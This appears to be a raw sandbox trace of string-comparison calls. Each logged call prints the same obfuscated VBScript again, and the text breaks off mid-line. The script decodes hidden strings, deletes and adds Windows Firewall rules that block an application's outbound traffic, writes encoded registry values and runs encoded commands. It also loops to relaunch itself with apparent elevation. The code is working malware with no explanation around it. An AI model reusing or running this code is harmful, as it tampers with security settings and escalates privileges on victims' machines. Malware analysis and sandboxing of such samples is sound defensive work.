bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.924] wcsncmp (_String1="x\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0222.924] wcsncmp (_String1="\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0222.924] wcsncmp (_String1="\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.924] wcsncmp (_String1="Dim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 